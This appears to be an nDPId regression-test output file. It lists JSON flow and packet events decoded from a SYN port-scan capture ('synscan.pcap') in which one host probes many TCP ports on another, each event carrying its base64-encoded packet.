+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":984,"source":"synscan.pcap","alias":"nDPId-test","flow_id":975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":984,"source":"synscan.pcap","alias":"nDPId-test","flow_id":975,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsJpAAADIG7+KsEAAIQA2GNIzTxnDdU4MZAAAAAGACDABmGwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":985,"source":"synscan.pcap","alias":"nDPId-test","flow_id":976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":985,"source":"synscan.pcap","alias":"nDPId-test","flow_id":976,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsddgAADIGoJqsEAAIQA2GNIzTCP3dU4MZAAAAAGACDAAjjwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":986,"source":"synscan.pcap","alias":"nDPId-test","flow_id":977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9618,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":986,"source":"synscan.pcap","alias":"nDPId-test","flow_id":977,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsId8AADoG7JOsEAAIQA2GNIzTJZLdU4MZAAAAAGACDAAG+gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":987,"source":"synscan.pcap","alias":"nDPId-test","flow_id":978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"synscan.pcap","alias":"nDPId-test","flow_id":978,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsc6IAACoGqtCsEAAIQA2GNIzTrZvdU4MZAAAAAGACDAB+8AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":988,"source":"synscan.pcap","alias":"nDPId-test","flow_id":979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14441,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":988,"source":"synscan.pcap","alias":"nDPId-test","flow_id":979,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAspioAAC0GdUisEAAIQA2GNIzTOGndU4MZAAAAAGACCAD4IgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":989,"source":"synscan.pcap","alias":"nDPId-test","flow_id":980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"synscan.pcap","alias":"nDPId-test","flow_id":980,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsiV0AADMGjBWsEAAIQA2GNIzTELfdU4MZAAAAAGACEAAX1QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":990,"source":"synscan.pcap","alias":"nDPId-test","flow_id":981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"synscan.pcap","alias":"nDPId-test","flow_id":981,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsDLwAADEGCresEAAIQA2GNIzTH\/TdU4MZAAAAAGACCAAQmAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":991,"source":"synscan.pcap","alias":"nDPId-test","flow_id":982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":991,"source":"synscan.pcap","alias":"nDPId-test","flow_id":982,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAslZYAADIGgNysEAAIQA2GNIzTFi\/dU4MZAAAAAGACDAAWXQAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":992,"source":"synscan.pcap","alias":"nDPId-test","flow_id":983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":992,"source":"synscan.pcap","alias":"nDPId-test","flow_id":983,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsq3UAADsGYf2sEAAIQA2GNIzTA9vdU4MZAAAAAGACEAAksQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":993,"source":"synscan.pcap","alias":"nDPId-test","flow_id":984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":993,"source":"synscan.pcap","alias":"nDPId-test","flow_id":984,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAs8X8AAC4GKPOsEAAIQA2GNIzTHmLdU4MZAAAAAGACDAAOKgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":994,"source":"synscan.pcap","alias":"nDPId-test","flow_id":985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"synscan.pcap","alias":"nDPId-test","flow_id":985,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsmB0AADMGfVWsEAAIQA2GNIzSeT7dUoMYAAAAAGACEACvUAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":995,"source":"synscan.pcap","alias":"nDPId-test","flow_id":986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"synscan.pcap","alias":"nDPId-test","flow_id":986,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsU8cAACkGy6usEAAIQA2GNIzSLuDdUoMYAAAAAGACCAABrwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":996,"source":"synscan.pcap","alias":"nDPId-test","flow_id":987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":996,"source":"synscan.pcap","alias":"nDPId-test","flow_id":987,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsXS0AACwGv0WsEAAIQA2GNIzSKXjdUoMYAAAAAGACBAALFwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"synscan.pcap","alias":"nDPId-test","flow_id":988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"synscan.pcap","alias":"nDPId-test","flow_id":988,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsxRsAADcGTFesEAAIQA2GNIzSBCPdUoMYAAAAAGACEAAkbAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":998,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsOP4AADQG23SsEAAIQA2GNIzSCizdUoMYAAAAAGACBAAqYwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"synscan.pcap","alias":"nDPId-test","flow_id":990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"synscan.pcap","alias":"nDPId-test","flow_id":990,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsP6EAACcG4dGsEAAIQA2GNIzSxUTdUoMYAAAAAGACEABjSgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1000,"source":"synscan.pcap","alias":"nDPId-test","flow_id":991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"synscan.pcap","alias":"nDPId-test","flow_id":991,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAslXMAACkGif+sEAAIQA2GNIzSEVvdUoMYAAAAAGACCAAfNAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"synscan.pcap","alias":"nDPId-test","flow_id":992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"synscan.pcap","alias":"nDPId-test","flow_id":992,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsfHcAACsGoPusEAAIQA2GNIzSB2zdUoMYAAAAAGACEAAhIwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1002,"source":"synscan.pcap","alias":"nDPId-test","flow_id":993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1002,"source":"synscan.pcap","alias":"nDPId-test","flow_id":993,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsIMoAADgG76isEAAIQA2GNIzSBHHdUoMYAAAAAGACBAAwHgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1003,"source":"synscan.pcap","alias":"nDPId-test","flow_id":994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"synscan.pcap","alias":"nDPId-test","flow_id":994,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsI7sAADYG7resEAAIQA2GNIzSI3ndUoMYAAAAAGACDAAJFgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":995,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5802,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":995,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAseE4AACgGqCSsEAAIQA2GNIzSFqrdUoMYAAAAAGACBAAd5QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":996,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":996,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsC6AAAC8GDdOsEAAIQA2GNIzSTVndUoMYAAAAAGACEADbNQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1006,"source":"synscan.pcap","alias":"nDPId-test","flow_id":997,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"synscan.pcap","alias":"nDPId-test","flow_id":997,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAs4+4AADAGNISsEAAIQA2GNIzSBaPdUoMYAAAAAGACBAAu7AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1007,"source":"synscan.pcap","alias":"nDPId-test","flow_id":998,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1007,"source":"synscan.pcap","alias":"nDPId-test","flow_id":998,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsYDsAACwGvDesEAAIQA2GNIzSgA\/dUoMYAAAAAGACBAC0fwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1008,"source":"synscan.pcap","alias":"nDPId-test","flow_id":999,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 